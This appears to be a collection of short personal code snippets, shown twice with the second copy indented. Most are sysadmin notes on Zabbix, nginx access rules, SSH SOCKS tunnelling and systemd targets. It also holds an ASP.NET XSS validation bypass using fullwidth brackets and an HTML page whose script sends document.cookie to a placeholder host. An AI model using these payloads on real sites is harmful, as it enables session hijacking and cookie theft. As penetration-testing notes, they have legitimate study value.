Étienne Ducharme b13bs

## script.sh
if [ "$EUID" -ne 0 ]
  then echo "[-] Should be run as root!"
  exit
fi

## zabbix_agentd.conf
# This is a configuration file for Zabbix agent daemon (Unix)
# To get more information about Zabbix, visit http://www.zabbix.com

############ GENERAL PARAMETERS #################

### Option: PidFile
#	Name of PID file.
#
# Mandatory: no
# Default:

## auto-default-speaker.sh
# https://askubuntu.com/questions/158241/automatically-change-sound-input-output-device

# Add this line in /etc/pulse/default.pa
load-module module-switch-on-connect

## aspnet-validate-xss-bypass.py
#!/usr/bin/env python3
# source: http://gosecure.net/2016/03/22/xss-for-asp-net-developers/

# Name=XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E

import urllib.parse

input_string = "<img src=xxx onerror=alert(1)>"
replacements = {"%3C": "%EF%BC%9C", "%3E": "%EF%BC%9E"}

## index.html
<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>Page title</title>
</head>
<body>
  <script>
    document.location="http://url/?c=" + document.cookie;
  </script>

## default
# allow from LAN, deny from WAN
allow 192.168.1.0/24;
deny   all;


# allow from LAN, basicauth from WAN
satisfy  any;
allow 192.168.1.0/24;
deny   all;
auth_basic            "closed site";

## socks.sh
user@machine1 $
ssh -L 8081:localhost:8081 user@machine2 ssh -ND 8081 user@machine3

## cors.js
var script = document.createElement('script');script.src = "https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js";document.getElementsByTagName('head')[0].appendChild(script);

$.ajax({
	url: "https://fullurl-api.test",
	type: "OPTIONS",
	complete: function(result, status) {
		console.log(status)
		console.log(result)
	}
});

## SimpleHTTPServer6.py
import BaseHTTPServer
import SimpleHTTPServer
import socket


class HTTPServer6(BaseHTTPServer.HTTPServer):
    address_family = socket.AF_INET6


if __name__ == '__main__':

## desktop-env.sh
# enable
sudo systemctl set-default graphical.target

# disable
sudo systemctl set-default multi-user.target
	if [ "$EUID" -ne 0 ]
	then echo "[-] Should be run as root!"
	exit
	fi
	# This is a configuration file for Zabbix agent daemon (Unix)
	# To get more information about Zabbix, visit http://www.zabbix.com

	############ GENERAL PARAMETERS #################

	### Option: PidFile
	# Name of PID file.
	#
	# Mandatory: no
	# Default:
	# https://askubuntu.com/questions/158241/automatically-change-sound-input-output-device

	# Add this line in /etc/pulse/default.pa
	load-module module-switch-on-connect
	#!/usr/bin/env python3
	# source: http://gosecure.net/2016/03/22/xss-for-asp-net-developers/

	# Name=XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E

	import urllib.parse

	input_string = "<img src=xxx onerror=alert(1)>"
	replacements = {"%3C": "%EF%BC%9C", "%3E": "%EF%BC%9E"}
	<!doctype html>
	<html>
	<head>
	<meta charset="utf-8">
	<title>Page title</title>
	</head>
	<body>
	<script>
	document.location="http://url/?c=" + document.cookie;
	</script>
	# allow from LAN, deny from WAN
	allow 192.168.1.0/24;
	deny all;


	# allow from LAN, basicauth from WAN
	satisfy any;
	allow 192.168.1.0/24;
	deny all;
	auth_basic "closed site";
	user@machine1 $
	ssh -L 8081:localhost:8081 user@machine2 ssh -ND 8081 user@machine3
	var script = document.createElement('script');script.src = "https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js";document.getElementsByTagName('head')[0].appendChild(script);

	$.ajax({
	url: "https://fullurl-api.test",
	type: "OPTIONS",
	complete: function(result, status) {
	console.log(status)
	console.log(result)
	}
	});
	import BaseHTTPServer
	import SimpleHTTPServer
	import socket


	class HTTPServer6(BaseHTTPServer.HTTPServer):
	address_family = socket.AF_INET6


	if __name__ == '__main__':
	# enable
	sudo systemctl set-default graphical.target

	# disable
	sudo systemctl set-default multi-user.target